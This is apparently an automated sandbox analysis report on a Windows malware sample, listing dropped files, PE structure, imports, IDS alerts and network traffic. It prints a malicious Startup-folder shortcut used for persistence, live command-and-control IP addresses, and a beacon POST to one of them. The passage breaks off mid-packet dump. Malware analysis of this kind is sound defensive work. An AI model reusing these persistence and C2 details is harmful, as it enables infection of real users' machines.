                                                        SHA-256:9BD49F96FC0B3A7143FD550B2D550DDF151E438BDF15514A065E7F287D076DBD
                                                        SHA-512:939E0108944B5D1F510AA964EEFF4B3DDDEAC57B632FBB977189010D908FDD07E5D2D0CBB63A611997BE898768E86749E7821EC1A84259441EEADAD37D1F08EA
                                                        Malicious:false
                                                        Preview:=t..Pr........K..-]....yE\d".-..X..A.R. .Y....:[.>}..*b.,*..m....{....h]K..y...<<\DI.j.%.w.(..6(.d...#.u...0M..Ll.....\4{?.Co...V.Q...i.rE.;...6..m....J.c5.p".M...<.b..=rkp!<.?.Y....U.pX.(3..#..P...?Y.....o(.h...nd8.c.QG]ZWqH.4.oF..Z55L.../h.=..".s....#.'.O......../...W.!.._...~x...+G..$..z;.......=c.3.h...uMq.A...Sj1.P.<.f....{s[]..F\....TT.....^y......a......t....... ......m...Hv..m..5..._...FRk..~..+.z..;.T........f..M#.............H......K4....W.........4..s..N....a.."R...3.!hX#...L..s.....`aX..\..n.*+l%...O..cBPOW_.+aF.PG.....k-J..H....tF....GY3..?(l.....P..d....?.W.;....Af..x..Q.d.)....S..I..$1.'.V0.9..I.2.....A....zD(}X.....t..P#_ .*U{.v....r.xir.........%...O ..r....}..8..;./...1m...j.......KQ......|6".l......*k.....0......T..*.7...7..DZj7..-.y-.A.6.Y..(.Z.].....h{>$|.8...o..)...*N.1...,...4%.h..#... ....j=.t..4.7.4.O...VV/....GX.....1.-.efh-3..K.bj.w'.<.......u..r..AW`..i/)".5....\.z..3...2..-#.A...S..E...s..w!.6O..x.;

                                                        C:\Users\user\AppData\Local\config

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):416
                                                        Entropy (8bit):6.289882567348813
                                                        Encrypted:false
                                                        SSDEEP:6:/LzHxQt2R3wvu5k6y7tq2HeyEjBBGS6hb5RBRTCybOO6yYs8R/NnOpKPu9+qp+:/nxdvypqbHGJhb9RT3TVY/NCKw1+
                                                        MD5:9A1F3D32C87FD6201E71D438DECB2DCF
                                                        SHA1:4280142272EDF2FF56635DD0372BB0744E8D5963
                                                        SHA-256:DAD64AB0B79C247FC3CD00281EC80E371AD5F01E79FD1544A2742DB7C7880982
                                                        SHA-512:AC69E1FAD0102B9F3B87849A9C5F50A39353B130ED2F444882F27C4507AFE9AC0D0AE71AC33EEA4717525D29F5F57E417BC51A8FB8DBB65C35D27C9FC0FB9C14
                                                        Malicious:false
                                                        Preview:.......V.)...,,TS(":A...L"./].5#X1!.MY..Q.(.@)..Q9.$Z...\ <.M%.*X-.-^0..U+.3E.P...% .$>....$..%!Y...F-:.A...W=___3..@6.*[:.(G4;?\..?P7'(_$:W@...U...X_..BP&..X)T.U.].$"$.?..S%,,AT]-L<V*P>..]S=-M+=_X.W^V"..V.."G3T\_>].V.[+PS5$@Q.*Q&6.\...]# +OX./.....S.W.....(3[TV^RL.=3F^(ZWS..R..+G,'.\).WR..T[.S=@'.6R8V _ ..X?[WMY)?P..._.05O,.....?.-.Q.W?.../)T'Z.L..QF..._+..[]..Q0.V@5\PR..5Z^4-^..4M).1[&/V^1_7U56?GS".\*.1W.%.Z21-

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.url

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" >), ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):105
                                                        Entropy (8bit):4.854336890730994
                                                        Encrypted:false
                                                        SSDEEP:3:HRAbABGQaFyw3pYoCHyg4E2J5hA7FsLLPMD5QsvNDRLF:HRYF5yjoCHhJ23sK0DhZv
                                                        MD5:E8560B0AC30F5ED7DCA2287487EB56E4
                                                        SHA1:4D49C11951A6DAB76E2ACDA1C6C0ED4E7799686B
                                                        SHA-256:A82A533D6BAF1E990589EDE6859D6AE726742A50D5DCE431C2DB3F096489F746
                                                        SHA-512:A3D358B5FE3FF8544EAC8A75F43E226E191B8DF03D39C917734AFBAB3D47BC1F30950B6C9DFC41101D52AA1A7B12C09E6EF04827BC214F689B256B079835FE67
                                                        Malicious:true
                                                        Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" ..

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.998279395907474
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:sV9ElC4fU4.exe
                                                        File size:7'662'434 bytes
                                                        MD5:bf53f19b542df72aacf589a049619bc7
                                                        SHA1:1fdd0458c805758732b118a3b98fcc12877f5f54
                                                        SHA256:c5c3401f71f4361ed454bbd96ea7cdd8a9132a655815e35e207dfff0ea690469
                                                        SHA512:31c8be3877f44e87005ad9fdb55de190e88954d1647fcdd1563fe6d17bc88ed5333537bf510365d8e69aff865d7c81535708207cf0b8e331adbfd72f49662739
                                                        SSDEEP:196608:DEBX5DhP1gFOa/70gM8bGEvPV1RZ2Vjj77aOEDKTeIQg8Fw:DaJDhGwa/7YWHBZ2jSjDC83S
                                                        TLSH:C476335C524120A8F3B04DBE06F495B11993EC9E477E7196AB00FC4227BEDDA582BF39
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aKZe%*46%*46%*46,R.6&*46,R.64*46%*56.*46>..6+*46>..6$*46>..6$*46Rich%*46........PE..L.....GO.................p....>..B...8.....

                                                        File Icon

                                                        Icon Hash:8fcae4f0f0f93260

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x403899
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x4F47E2CF [Fri Feb 24 19:19:43 2012 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:0
                                                        File Version Major:5
                                                        File Version Minor:0
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:0
                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 000002D4h
                                                        push ebx
                                                        push ebp
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        xor ebp, ebp
                                                        pop esi
                                                        mov dword ptr [esp+18h], ebp
                                                        mov dword ptr [esp+10h], 00409268h
                                                        mov dword ptr [esp+14h], ebp
                                                        call dword ptr [00408030h]
                                                        push 00008001h
                                                        call dword ptr [004080B4h]
                                                        push ebp
                                                        call dword ptr [004082C0h]
                                                        push 00000008h
                                                        mov dword ptr [007F16D8h], eax
                                                        call 00007FF9F0ECF74Bh
                                                        push ebp
                                                        push 000002B4h
                                                        mov dword ptr [007F15F0h], eax
                                                        lea eax, dword ptr [esp+38h]
                                                        push eax
                                                        push ebp
                                                        push 00409264h
                                                        call dword ptr [00408184h]
                                                        push 0040924Ch
                                                        push 007E95E0h
                                                        call 00007FF9F0ECF42Dh
                                                        call dword ptr [004080B0h]
                                                        push eax
                                                        mov edi, 008420A0h
                                                        push edi
                                                        call 00007FF9F0ECF41Bh
                                                        push ebp
                                                        call dword ptr [00408134h]
                                                        cmp word ptr [008420A0h], 0022h
                                                        mov dword ptr [007F15F8h], eax
                                                        mov eax, edi
                                                        jne 00007FF9F0ECCD1Ah
                                                        push 00000022h
                                                        pop esi
                                                        mov eax, 008420A2h
                                                        push esi
                                                        push eax
                                                        call 00007FF9F0ECF0F1h
                                                        push eax
                                                        call dword ptr [00408260h]
                                                        mov esi, eax
                                                        mov dword ptr [esp+1Ch], esi
                                                        jmp 00007FF9F0ECCDA3h
                                                        push 00000020h
                                                        pop ebx
                                                        cmp ax, bx
                                                        jne 00007FF9F0ECCD1Ah
                                                        add esi, 02h
                                                        cmp word ptr [esi], bx

                                                        Rich Headers

                                                        Programming Language:
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ C ] VS2010 SP1 build 40219
                                                        • [RES] VS2010 SP1 build 40219
                                                        • [LNK] VS2010 SP1 build 40219

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4730000x3ec6.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x3f90000x948.ndata
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x6f1c0x7000033c4b7ef297e5f8dd0392c8206891d5False0.6666434151785714data6.523945678184037IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xb0000x3e66dc0x200f8e9fc8c226177087968ccda63fbab7dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x3f20000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x4730000x3ec60x40004e1a23dc29ce21cdaa904417ee03dee0False0.5399169921875data5.050672099511916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x4770000x320e0x3400cf8d1bc74b4aa65c037d42a512786f91False0.6129056490384616data5.624661687249082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x4731c00x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5481082180634662
                                                        RT_ICON0x4758280x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.5954007285974499
                                                        RT_DIALOG0x4769500x100dataEnglishUnited States0.5234375
                                                        RT_DIALOG0x476a500x11cdataEnglishUnited States0.6056338028169014
                                                        RT_DIALOG0x476b6c0x60dataEnglishUnited States0.7291666666666666
                                                        RT_GROUP_ICON0x476bcc0x22dataEnglishUnited States0.9411764705882353
                                                        RT_MANIFEST0x476bf00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                        Imports

                                                        DLLImport
                                                        KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                        USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                        SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                        ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-10-15T09:40:15.985563+02002855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2194.103.85.11430202192.168.2.849962TCP
                                                        2024-10-15T09:40:15.987244+02002855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M11192.168.2.84996294.103.85.11430202TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 15, 2024 09:39:41.153513908 CEST4971080192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:39:41.158411980 CEST804971046.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:39:41.158487082 CEST4971080192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:39:41.159495115 CEST4971080192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:39:41.164268017 CEST804971046.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:39:41.832618952 CEST804971046.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:39:41.846667051 CEST4971180192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:39:41.851617098 CEST804971146.8.236.61192.168.2.8
                                                        Oct 15, 2024 09:39:41.851675987 CEST4971180192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:39:41.852396965 CEST4971180192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:39:41.857264042 CEST804971146.8.236.61192.168.2.8
                                                        Oct 15, 2024 09:39:42.009474993 CEST4971080192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:39:42.532377005 CEST804971146.8.236.61192.168.2.8
                                                        Oct 15, 2024 09:39:42.557329893 CEST4971780192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:39:42.562207937 CEST804971793.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:39:42.562376022 CEST4971780192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:39:42.565439939 CEST4971780192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:39:42.570287943 CEST804971793.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:39:42.610166073 CEST4971180192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:39:43.248764038 CEST804971793.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:39:43.313280106 CEST4971780192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:39:43.524199963 CEST4971880192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:39:43.529119015 CEST804971891.212.166.91192.168.2.8
                                                        Oct 15, 2024 09:39:43.529185057 CEST4971880192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:39:43.534600019 CEST4971880192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:39:43.539396048 CEST804971891.212.166.91192.168.2.8
                                                        Oct 15, 2024 09:39:44.234153032 CEST804971891.212.166.91192.168.2.8
                                                        Oct 15, 2024 09:39:44.244951963 CEST4971880192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:39:44.245037079 CEST4971780192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:39:44.245089054 CEST4971180192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:39:44.245124102 CEST4971080192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:39:44.250123978 CEST804971891.212.166.91192.168.2.8
                                                        Oct 15, 2024 09:39:44.250189066 CEST4971880192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:39:44.250560045 CEST804971793.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:39:44.250575066 CEST804971146.8.236.61192.168.2.8
                                                        Oct 15, 2024 09:39:44.250602007 CEST804971046.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:39:44.250652075 CEST4971780192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:39:44.250670910 CEST4971180192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:39:44.250682116 CEST4971080192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:39:55.229582071 CEST4981280192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:39:55.234566927 CEST804981246.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:39:55.234679937 CEST4981280192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:39:55.235788107 CEST4981280192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:39:55.240561962 CEST804981246.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:39:55.908557892 CEST804981246.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:39:55.913149118 CEST4981880192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:39:55.918039083 CEST804981846.8.236.61192.168.2.8
                                                        Oct 15, 2024 09:39:55.918153048 CEST4981880192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:39:55.918968916 CEST4981880192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:39:55.923748970 CEST804981846.8.236.61192.168.2.8
                                                        Oct 15, 2024 09:39:55.951033115 CEST4981280192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:39:56.597656012 CEST804981846.8.236.61192.168.2.8
                                                        Oct 15, 2024 09:39:56.654181004 CEST4981880192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:39:56.661788940 CEST4982480192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:39:56.666841030 CEST804982493.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:39:56.667664051 CEST4982480192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:39:56.668065071 CEST4982480192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:39:56.672890902 CEST804982493.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:39:57.533864021 CEST804982493.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:39:57.536699057 CEST4983080192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:39:57.541580915 CEST804983091.212.166.91192.168.2.8
                                                        Oct 15, 2024 09:39:57.541649103 CEST4983080192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:39:57.541879892 CEST4983080192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:39:57.546614885 CEST804983091.212.166.91192.168.2.8
                                                        Oct 15, 2024 09:39:57.567087889 CEST804982493.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:39:57.567150116 CEST4982480192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:39:58.239454985 CEST804983091.212.166.91192.168.2.8
                                                        Oct 15, 2024 09:39:58.239877939 CEST4983080192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:39:58.239891052 CEST4982480192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:39:58.239965916 CEST4981880192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:39:58.240004063 CEST4981280192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:39:58.245167017 CEST804983091.212.166.91192.168.2.8
                                                        Oct 15, 2024 09:39:58.245219946 CEST804982493.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:39:58.245277882 CEST4983080192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:39:58.245279074 CEST4982480192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:39:58.245666981 CEST804981846.8.236.61192.168.2.8
                                                        Oct 15, 2024 09:39:58.245682001 CEST804981246.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:39:58.245738983 CEST4981880192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:39:58.245739937 CEST4981280192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:40:14.314337969 CEST4995280192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:40:14.320678949 CEST804995246.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:40:14.320805073 CEST4995280192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:40:14.343102932 CEST4995280192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:40:14.347862959 CEST804995246.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:40:15.378089905 CEST804995246.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:40:15.384505987 CEST4996230202192.168.2.894.103.85.114
                                                        Oct 15, 2024 09:40:15.389466047 CEST302024996294.103.85.114192.168.2.8
                                                        Oct 15, 2024 09:40:15.389542103 CEST4996230202192.168.2.894.103.85.114
                                                        Oct 15, 2024 09:40:15.438657045 CEST4995280192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:40:15.985563040 CEST302024996294.103.85.114192.168.2.8
                                                        Oct 15, 2024 09:40:15.987243891 CEST4996230202192.168.2.894.103.85.114
                                                        Oct 15, 2024 09:40:15.992166996 CEST302024996294.103.85.114192.168.2.8
                                                        Oct 15, 2024 09:40:28.241219044 CEST4998780192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:40:28.246267080 CEST804998746.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:40:28.246392965 CEST4998780192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:40:28.246815920 CEST4998780192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:40:28.251631975 CEST804998746.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:40:29.017896891 CEST804998746.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:40:29.075264931 CEST4998780192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:40:29.930876970 CEST4998880192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:40:29.935777903 CEST804998846.8.236.61192.168.2.8
                                                        Oct 15, 2024 09:40:29.935849905 CEST4998880192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:40:29.998989105 CEST4998880192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:40:30.003915071 CEST804998846.8.236.61192.168.2.8
                                                        Oct 15, 2024 09:40:30.613538980 CEST804998846.8.236.61192.168.2.8
                                                        Oct 15, 2024 09:40:30.616311073 CEST4998980192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:40:30.621166945 CEST804998993.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:40:30.621258974 CEST4998980192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:40:30.622271061 CEST4998980192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:40:30.627063990 CEST804998993.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:40:30.653965950 CEST4998880192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:40:30.997519016 CEST4996230202192.168.2.894.103.85.114
                                                        Oct 15, 2024 09:40:31.002490044 CEST302024996294.103.85.114192.168.2.8
                                                        Oct 15, 2024 09:40:31.304588079 CEST804998993.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:40:31.309293032 CEST4999080192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:40:31.314152002 CEST804999091.212.166.91192.168.2.8
                                                        Oct 15, 2024 09:40:31.316137075 CEST4999080192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:40:31.316394091 CEST4999080192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:40:31.321196079 CEST804999091.212.166.91192.168.2.8
                                                        Oct 15, 2024 09:40:31.348310947 CEST4998980192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:40:32.013349056 CEST804999091.212.166.91192.168.2.8
                                                        Oct 15, 2024 09:40:32.013583899 CEST4999080192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:40:32.013597965 CEST4998980192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:40:32.013633013 CEST4998880192.168.2.846.8.236.61
                                                        Oct 15, 2024 09:40:32.013645887 CEST4998780192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:40:32.018641949 CEST804998993.185.159.253192.168.2.8
                                                        Oct 15, 2024 09:40:32.018707037 CEST4998980192.168.2.893.185.159.253
                                                        Oct 15, 2024 09:40:32.019197941 CEST804999091.212.166.91192.168.2.8
                                                        Oct 15, 2024 09:40:32.019211054 CEST804998746.8.232.106192.168.2.8
                                                        Oct 15, 2024 09:40:32.019222021 CEST804998846.8.236.61192.168.2.8
                                                        Oct 15, 2024 09:40:32.019242048 CEST4999080192.168.2.891.212.166.91
                                                        Oct 15, 2024 09:40:32.019270897 CEST4998780192.168.2.846.8.232.106
                                                        Oct 15, 2024 09:40:32.019292116 CEST4998880192.168.2.846.8.236.61

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 15, 2024 09:38:32.745006084 CEST5260853192.168.2.81.1.1.1
                                                        Oct 15, 2024 09:38:32.759732008 CEST53526081.1.1.1192.168.2.8
                                                        Oct 15, 2024 09:38:47.959995985 CEST5242753192.168.2.81.1.1.1
                                                        Oct 15, 2024 09:38:47.975174904 CEST53524271.1.1.1192.168.2.8

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Oct 15, 2024 09:38:32.745006084 CEST192.168.2.81.1.1.10x1a28Standard query (0)CFIXDPmIiBsstXCezGs.CFIXDPmIiBsstXCezGsA (IP address)IN (0x0001)false
                                                        Oct 15, 2024 09:38:47.959995985 CEST192.168.2.81.1.1.10x9eafStandard query (0)CFIXDPmIiBsstXCezGs.CFIXDPmIiBsstXCezGsA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Oct 15, 2024 09:38:32.759732008 CEST1.1.1.1192.168.2.80x1a28Name error (3)CFIXDPmIiBsstXCezGs.CFIXDPmIiBsstXCezGsnonenoneA (IP address)IN (0x0001)false
                                                        Oct 15, 2024 09:38:47.975174904 CEST1.1.1.1192.168.2.80x9eafName error (3)CFIXDPmIiBsstXCezGs.CFIXDPmIiBsstXCezGsnonenoneA (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • 46.8.232.106
                                                        • 46.8.236.61
                                                        • 93.185.159.253
                                                        • 91.212.166.91

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.84971046.8.232.106807096C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:39:41.159495115 CEST298OUTPOST / HTTP/1.1
                                                        Host: 46.8.232.106
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
